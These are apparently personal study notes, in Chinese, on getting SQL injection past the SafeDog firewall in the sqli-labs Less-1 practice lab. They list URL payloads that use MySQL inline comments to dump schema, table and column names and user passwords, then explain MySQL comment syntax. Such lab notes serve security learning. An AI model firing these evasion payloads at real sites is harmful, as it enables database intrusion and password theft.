http://115.159.97.35/sqli-labs-master/Less-1/?id=1
安全狗绕过
参考 https://www.cnblogs.com/Yang34/p/12055052.html
?id=1' order/*!99999asd*/by 3 --+
?id=-1'union/*!99999test*/select 1,2,/*!99999test*/group_concat(schema_name) from information_schema.schemata--+
?id=-1'union/*!99999test*/select 1,2,/*!99999test*/group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1'union/*!99999test*/select 1,2,/*!99999test*/group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1'union/*!99999asd*/select 1,2,/*!99999asd*/group_concat(password) from security.users --+
所以这个 /*!99999asd*/ 到底是个啥?
注释
1、单行注释,#后面直接加内容 ;单行注释,--后面必须要加空格 ;
2、多行注释,/**/中间可以跨行;
3、内联注入, 内联注释是MySQL数据库为了保持与其他数据库兼容,特意新添加的功能。
为了避免从MySQL中导出的SQL语句不能被其他数据库使用,它把一些 MySQL特有的语句放在 /*! ... */ 中,
这些语句在不兼容的数据库中使用时便 不会执行。而MySQL自身却能识别、执行。